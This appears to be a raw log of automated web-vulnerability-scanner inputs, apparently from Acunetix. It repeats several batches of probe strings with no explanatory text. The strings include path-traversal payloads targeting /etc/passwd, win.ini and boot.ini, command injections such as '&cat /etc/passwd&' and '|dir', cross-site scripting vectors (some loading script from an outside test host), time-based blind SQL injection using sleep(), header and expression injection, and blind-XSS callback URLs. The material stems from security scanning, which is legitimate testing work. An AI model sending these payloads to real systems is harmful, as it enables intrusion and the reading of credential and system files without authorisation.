1_948111

1

"|dir

1

1

1

../../../../../../../../../../windows/win.ini

acu6589\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca6589

1

1

1

../../../../../../../../../../boot.ini

1

1

acux1174\xc0\xbez1\xc0\xbcz2a\x90bcxuca1174

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<ScRiPt >prompt(919551)</ScRiPt>

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

1<script>prompt(985330)</script>

1

................windowswin.ini

1

1<ScRiPt >prompt(903187)</ScRiPt>

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?961451></ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(928932)</ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<video><source onerror="javascript:prompt(910602)">

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(983861)"></g></svg>

1

1

response.write(9965286*9508455)

1<div style=width:expression(prompt(952584))>

1

1

1

'+response.write(9965286*9508455)+'

WEB-INF/web.xml

1<iframe src='data:text/html

&cat /etc/passwd&

SomeCustomInjectedHeader:injected_by_wvs

1

"+response.write(9965286*9508455)+"

1

'&cat /etc/passwd&'

WEB-INF\web.xml

../../../../../../../../../../etc/passwd

1<body onload=prompt(966831)>

SomeCustomInjectedHeader:injected_by_wvs

1

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

"&cat /etc/passwd&"

1

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(966233)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

cat /etc/passwd

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

1

1

${99620+99151}

1<img src=xyz OnErRor=prompt(931337)>

../../../../../../../../../../etc/passwd.jpg

1

`cat /etc/passwd`

1

-1

1

1

1

1<img/src=">" onerror=alert(962858)>

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

|cat /etc/passwd#

-1)

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1&n970073=v936356

1<ScRiPt%20>prompt(985433)</sCripT>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

'|'ld

-1))

1

1some_inexistent_file_with_long_name%00.jpg

1

1

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

)

"|"ld

HvgjwOde'

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

\xf6<img acu onmouseover=prompt(942076) //\xf6>

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'"()

http://testasp.vulnweb.com/t/xss.html?%00.jpg

r6JlKSvr')

1

testasp.vulnweb.com

'

1<input autofocus onfocus=prompt(982524)>

^(#$!@#$)(()))******

/etc/passwd

'

1

1

Vg2fI1oW'))

1

1

"

<a href='http://www.acunetix.com'>website security</a>

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

"

1

-1

1

${@print(md5(acunetix_wvs_security_test))}

1

1

[url=http://www.acunetix.com]website security[/url]

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

||cat /etc/passwd

http://hitvXrC1dD6Ta.bxss.me/

-1)

acunetix_wvs_invalid_filename

${@print(md5(acunetix_wvs_security_test))}\

1

1

1_Mfptn <ScRiPt >prompt(990543)</ScRiPt>

&dir

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

comments

-1))

1

1

1

1

'&dir&'

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

n5w3UEvB'

comments

http://www.acunetix.tst

1

1

1

"&dir&"

1

file:///etc/passwd

1

hZz4Eact')

1

comments/.

1

1

'"

|dir

/\../\../\../\../\../\../\../etc/passwd

1

1'"()&%<ScRiPt >prompt(945533)</ScRiPt>

cYCm3oxc'))

1

1

<!--

1

'|dir

WEB-INF/web.xml

'"()&%<ScRiPt >prompt(902257)</ScRiPt>

1

1

1

1

1_957404

1

"|dir

WEB-INF\web.xml

1

1

1

1

../../../../../../../../../../windows/win.ini

1

1

1

acu1309\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca1309

1

../../../../../../../../../../boot.ini

1

1

1

../../../../../../../../../../windows/win.ini.jpg

acux2602\xc0\xbez1\xc0\xbcz2a\x90bcxuca2602

1

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(998374)</ScRiPt>

1

................windowswin.ini

1

1

1<script>prompt(954595)</script>

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1

1<ScRiPt >prompt(933103)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?957829></ScRiPt>

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt >prompt(997741)</ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1<video><source onerror="javascript:prompt(977386)">

1

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(961731)"></g></svg>

response.write(9551286*9512618)

1

WEB-INF/web.xml

1

1<div style=width:expression(prompt(909098))>

1

'+response.write(9551286*9512618)+'

1

1

WEB-INF\web.xml

&cat /etc/passwd&

1<iframe src='data:text/html

1

1

1

SomeCustomInjectedHeader:injected_by_wvs

"+response.write(9551286*9512618)+"

1<body onload=prompt(998485)>

1

'&cat /etc/passwd&'

1

1

../../../../../../../../../../etc/passwd

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(989230)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

"&cat /etc/passwd&"

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

1<img src=xyz OnErRor=prompt(975210)>

1

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1

1

-1

../../../../../../../../../../etc/passwd.jpg

1<img/src=">" onerror=alert(923791)>

1

1

1

`cat /etc/passwd`

1

${100468+99458}

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

-1)

1<ScRiPt%20>prompt(974837)</sCripT>

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1

|cat /etc/passwd#

1

1

1&n910420=v981161

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

-1))

1

1&lt

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

)

1

qbRsgtOh'

1

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

\xf6<img acu onmouseover=prompt(915309) //\xf6>

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

!(()&&!|*|*|

"|"ld

1

ZjruMGgD')

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

testasp.vulnweb.com

'"()

1

1<input autofocus onfocus=prompt(946814)>

^(#$!@#$)(()))******

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

xTBTS4Ij'))

'

/etc/passwd

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

'

1

-1

[url=http://www.acunetix.com]website security[/url]

"

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1

"

1

-1)

${@print(md5(acunetix_wvs_security_test))}

1_r3ZQB <ScRiPt >prompt(984659)</ScRiPt>

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

http://hit7FqDVlspUx.bxss.me/

1

||cat /etc/passwd

1

${@print(md5(acunetix_wvs_security_test))}\

acunetix_wvs_invalid_filename

-1))

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

1

&dir

1

comments

1

MZyVIi9V'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

http://www.acunetix.tst

1

comments

'&dir&'

1

1

F2r82JDB')

1

1

1

file:///etc/passwd

'"

"&dir&"

comments/.

1'"()&%<ScRiPt >prompt(915644)</ScRiPt>

1

tlPih4yr'))

1

/\../\../\../\../\../\../\../etc/passwd

<!--

|dir

1

'"()&%<ScRiPt >prompt(970288)</ScRiPt>

1

1

1

WEB-INF/web.xml

1

'|dir

1

1_936563

1

1

1

WEB-INF\web.xml

"|dir

1

1

acu10903\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca10903

1

1

../../../../../../../../../../windows/win.ini

1

1

1

1

../../../../../../../../../../boot.ini

acux2169\xc0\xbez1\xc0\xbcz2a\x90bcxuca2169

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1<ScRiPt >prompt(980944)</ScRiPt>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<script>prompt(994636)</script>

1

1

1

1<ScRiPt >prompt(963062)</ScRiPt>

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?976483></ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt >prompt(995510)</ScRiPt>

1

1

1

1

1<video><source onerror="javascript:prompt(980796)">

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(936672)"></g></svg>

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9664114*9464204)

1

1

1<div style=width:expression(prompt(902846))>

1

'+response.write(9664114*9464204)+'

1

1<iframe src='data:text/html

&cat /etc/passwd&

1

WEB-INF/web.xml

1

../../../../../../../../../../etc/passwd

"+response.write(9664114*9464204)+"

SomeCustomInjectedHeader:injected_by_wvs

1

1<body onload=prompt(980245)>

'&cat /etc/passwd&'

WEB-INF\web.xml

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(948122)>

1

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

1

../../../../../../../../../../etc/passwd.jpg

1

SomeCustomInjectedHeader:injected_by_wvs

1

cat /etc/passwd

1<img src=xyz OnErRor=prompt(974267)>

1

-1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

${100266+99588}

1

1<img/src=">" onerror=alert(956033)>

1

`cat /etc/passwd`

1

-1)

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

1

1<ScRiPt%20>prompt(985427)</sCripT>

1

|cat /etc/passwd#

1

-1))

1&n967582=v913441

/../..//../..//../..//../..//../..//etc/passwd.jpg

1some_inexistent_file_with_long_name%00.jpg

1

'|'ld

1&lt

1

1

\xf6<img acu onmouseover=prompt(982538) //\xf6>

6QhTztBL'

1

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

"|"ld

)

testasp.vulnweb.com

1

1<input autofocus onfocus=prompt(954464)>

pOlsQ9CN')

/etc/passwd

1

!(()&&!|*|*|

^(#$!@#$)(()))******

1

1

<a href='http://www.acunetix.com'>website security</a>

2VM8Fmhw'))

'"()

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

'

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

1

1

[url=http://www.acunetix.com]website security[/url]

-1

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

"

1

1

1

1_UAfzY <ScRiPt >prompt(912968)</ScRiPt>

1

-1)

1

${@print(md5(acunetix_wvs_security_test))}

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

||cat /etc/passwd

acunetix_wvs_invalid_filename

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}\

-1))

http://hit8U6HZHf39L.bxss.me/

file:///etc/passwd

&dir

comments

1

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

YD9oELdK'

1

1

/\../\../\../\../\../\../\../etc/passwd

1

comments

'&dir&'

1

1

1

7GsiiRaA')

1

'"

WEB-INF/web.xml

http://www.acunetix.tst

"&dir&"

comments/.

1

1'"()&%<ScRiPt >prompt(929266)</ScRiPt>

fikM54R3'))

1

WEB-INF\web.xml

<!--

|dir

1

1

1

'"()&%<ScRiPt >prompt(996625)</ScRiPt>

1

../../../../../../../../../../windows/win.ini

1

'|dir

1

1

1

1_971206

../../../../../../../../../../boot.ini

1

1

"|dir

1

1

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1

acu2120\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca2120

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1

1

1

acux2083\xc0\xbez1\xc0\xbcz2a\x90bcxuca2083

1

................windowswin.ini

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(915213)</ScRiPt>

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1

1

1<script>prompt(913435)</script>

1

1

1<ScRiPt >prompt(918095)</ScRiPt>

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?903472></ScRiPt>

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1<ScRiPt >prompt(907262)</ScRiPt>

1

1

1

1

1<video><source onerror="javascript:prompt(940251)">

WEB-INF/web.xml

1

response.write(9776573*9184451)

1

WEB-INF\web.xml

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(989424)"></g></svg>

1

1

1

'+response.write(9776573*9184451)+'

1

1<div style=width:expression(prompt(986908))>

1

1

&cat /etc/passwd&

"+response.write(9776573*9184451)+"

1

1

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

1

1

'&cat /etc/passwd&'

1

1<body onload=prompt(981361)>

SomeCustomInjectedHeader:injected_by_wvs

1

../../../../../../../../../../etc/passwd

1

if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/

1

"&cat /etc/passwd&"

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(977419)>

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

SomeCustomInjectedHeader:injected_by_wvs

1

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1

cat /etc/passwd

1

1

1<img src=xyz OnErRor=prompt(966159)>

1

../../../../../../../../../../etc/passwd.jpg

1

-1

1

1

`cat /etc/passwd`

${100107+99364}

1<img/src=">" onerror=alert(991479)>

1

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1&n903008=v904800

-1)

1

1

|cat /etc/passwd#

1some_inexistent_file_with_long_name%00.jpg

1

1<ScRiPt%20>prompt(971917)</sCripT>

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

'|'ld

1

-1))

1

1

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

)

1&lt

/../..//../..//../..//../..//../..//etc/passwd.jpg

xgiNdiIv'

"|"ld

1

testasp.vulnweb.com

!(()&&!|*|*|

\xf6<img acu onmouseover=prompt(964688) //\xf6>

1

'"()

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

'

epPF3fbQ')

1

http://testasp.vulnweb.com/t/xss.html?%00.jpg

^(#$!@#$)(()))******

1<input autofocus onfocus=prompt(936082)>

1

1

/etc/passwd

'

"

vP9AnofP'))

1

1

1

<a href='http://www.acunetix.com'>website security</a>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

-1

"

${@print(md5(acunetix_wvs_security_test))}

1

1

1

[url=http://www.acunetix.com]website security[/url]

1

http://hitFzdCrYEng6.bxss.me/

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

-1)

acunetix_wvs_invalid_filename

||cat /etc/passwd

${@print(md5(acunetix_wvs_security_test))}\

1

1

1_pNzfL <ScRiPt >prompt(975302)</ScRiPt>

1

1

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

1

-1))

comments

&dir

1

1

1

1

comments

http://www.acunetix.tst

tO80EMZM'

'&dir&'

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

1

1

1

file:///etc/passwd

1

comments/.

"&dir&"

mftMjfoB')

1

1

'"

1

1

/\../\../\../\../\../\../\../etc/passwd

1

1

1vCeMdIz'))

1'"()&%<ScRiPt >prompt(938061)</ScRiPt>

|dir

<!--

1

WEB-INF/web.xml

1

1

1

'"()&%<ScRiPt >prompt(957930)</ScRiPt>

'|dir

1

1

WEB-INF\web.xml

1

1_910123

1

1

"|dir

1

../../../../../../../../../../windows/win.ini

1

1

1

1

acu7316\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca7316

../../../../../../../../../../boot.ini

1

1

1

acux8604\xc0\xbez1\xc0\xbcz2a\x90bcxuca8604

1

../../../../../../../../../../windows/win.ini.jpg

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(920772)</ScRiPt>

1

1

1

................windowswin.ini

1<script>prompt(937000)</script>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<ScRiPt >prompt(992432)</ScRiPt>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?938526></ScRiPt>

1

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1

1<ScRiPt >prompt(967932)</ScRiPt>

1

1

1

response.write(9760533*9460239)

1<video><source onerror="javascript:prompt(974329)">

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

1

1

'+response.write(9760533*9460239)+'

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(980955)"></g></svg>

1

1

"+response.write(9760533*9460239)+"

1

&cat /etc/passwd&

1<div style=width:expression(prompt(983143))>

WEB-INF/web.xml

1

1

1

../../../../../../../../../../etc/passwd

SomeCustomInjectedHeader:injected_by_wvs

1<iframe src='data:text/html

'&cat /etc/passwd&'

WEB-INF\web.xml

1

1

if(now()=sysdate(),sleep(3),0)/*'XOR(if(now()=sysdate(),sleep(3),0))OR'"XOR(if(now()=sysdate(),sleep(3),0))OR"*/

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1<body onload=prompt(928325)>

SomeCustomInjectedHeader:injected_by_wvs

"&cat /etc/passwd&"

1

1

1

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

../../../../../../../../../../etc/passwd.jpg

1

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(985355)>

SomeCustomInjectedHeader:injected_by_wvs

${99922+99687}

cat /etc/passwd

1

1&n903706=v982228

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

-1

1<img src=xyz OnErRor=prompt(992217)>

1

1

1

`cat /etc/passwd`

1

1some_inexistent_file_with_long_name%00.jpg

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

-1)

1<img/src=">" onerror=alert(991709)>

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

)

1

|cat /etc/passwd#

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

-1))

1<ScRiPt%20>prompt(964373)</sCripT>

!(()&&!|*|*|

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

1

1

'|'ld

'"()

testasp.vulnweb.com

1

1xCWIy3J'

1&lt

/etc/passwd

^(#$!@#$)(()))******

1

"|"ld

1

1

1

rkYtgOYr')

\xf6<img acu onmouseover=prompt(960013) //\xf6>

1

'

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

1

1

1

1<input autofocus onfocus=prompt(976627)>

RMyWyPBk'))

http://testasp.vulnweb.com/t/xss.html?%00.jpg

1

1

"

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

1

'

1

<a href='http://www.acunetix.com'>website security</a>

-1

1

1

1

1

${@print(md5(acunetix_wvs_security_test))}

..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xaf..\xc0\xafetc/passwd

"

acunetix_wvs_invalid_filename

-1)

[url=http://www.acunetix.com]website security[/url]

http://hitzNC53MH7H6.bxss.me/

1

1

${@print(md5(acunetix_wvs_security_test))}\

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

comments

||cat /etc/passwd

-1))

1_pPoU9 <ScRiPt >prompt(955724)</ScRiPt>

1

1

1

1

1

&dir

comments

file:///etc/passwd

1

GFlDIhRE'

1

comments/.

http://www.acunetix.tst

1

'"

1'"()&%<ScRiPt >prompt(949484)</ScRiPt>

'&dir&'

/\../\../\../\../\../\../\../etc/passwd

NHFft8JZ')

1

1

1

1

1

"&dir&"

<!--

'"()&%<ScRiPt >prompt(935793)</ScRiPt>

WEB-INF/web.xml

p3DabuFb'))

1

1

1

1

1_997934

1

|dir

WEB-INF\web.xml

1

1

1

1

1

acu8236\xef\xbc\x9cs1\xef\xb9\xa5s2\xca\xbas3\xca\xb9uca8236

'|dir

../../../../../../../../../../windows/win.ini

1

1

1

"|dir

acux8417\xc0\xbez1\xc0\xbcz2a\x90bcxuca8417

../../../../../../../../../../boot.ini

1

1

1

1<ScRiPt >prompt(981585)</ScRiPt>

1

../../../../../../../../../../windows/win.ini.jpg

1

1

1<script>prompt(941365)</script>

1

1

1

\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xaf\xc0\xae\xc0\xae\xc0\xafwindows\xc0\xafwin.ini

1<ScRiPt >prompt(964868)</ScRiPt>

1

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?952444></ScRiPt>

1

1

................windowswin.ini

1

1<ScRiPt >prompt(994938)</ScRiPt>

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1

1<video><source onerror="javascript:prompt(920990)">

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(920990)">

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(920990)">

1

1

1

1

..\..\..\..\..\..\..\..\windows\win.ini

1<video><source onerror="javascript:prompt(920990)">

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977278)"></g></svg>

1

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977278)"></g></svg>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977278)"></g></svg>

1

1

1

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

1<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:prompt(977278)"></g></svg>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<div style=width:expression(prompt(944023))>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<div style=width:expression(prompt(944023))>

1

1

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

1<div style=width:expression(prompt(944023))>

1

1

1

1

1<iframe src='data:text/html

1

1

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

response.write(9510160*9182080)

1

1<body onload=prompt(929951)>

1

1

'+response.write(9510160*9182080)+'

1<img src=//testasp.vulnweb.com/t/dot.gif onload=prompt(952141)>

1

&cat /etc/passwd&

1

1

WEB-INF/web.xml

"+response.write(9510160*9182080)+"

1<img src=xyz OnErRor=prompt(982053)>

if(now()=sysdate(),sleep(10.218),0)/*'XOR(if(now()=sysdate(),sleep(10.218),0))OR'"XOR(if(now()=sysdate(),sleep(10.218),0))OR"*/

SomeCustomInjectedHeader:injected_by_wvs

../../../../../../../../../../etc/passwd

'&cat /etc/passwd&'

WEB-INF\web.xml

1

1

1

1<img/src=">" onerror=alert(996416)>

SomeCustomInjectedHeader:injected_by_wvs

(select(0)from(select(sleep(10.218)))v)/*'+(select(0)from(select(sleep(10.218)))v)+'"+(select(0)from(select(sleep(10.218)))v)+"*/

1

1

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

"&cat /etc/passwd&"

1<ScRiPt%20>prompt(920926)</sCripT>

1

1

SomeCustomInjectedHeader:injected_by_wvs

-1

1

cat /etc/passwd

1

${100037+100466}

../../../../../../../../../../etc/passwd.jpg

1

1&lt

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg

-1)

1

Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n

1

1&n920726=v987766

`cat /etc/passwd`

1

1some_inexistent_file_with_long_name%00.jpg

1

\xf6<img acu onmouseover=prompt(900585) //\xf6>

1

-1))

)

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

1

1

|cat /etc/passwd#

http://testasp.vulnweb.com/t/fit.txt?%00.jpg

1

1<input autofocus onfocus=prompt(918510)>

1

T8up8q0K'

!(()&&!|*|*|

/../..//../..//../..//../..//../..//etc/passwd.jpg

1

testasp.vulnweb.com

'|'ld

1

<a href='http://www.acunetix.com'>website security</a>

rWkhnn2P')

^(#$!@#$)(()))******

'"()

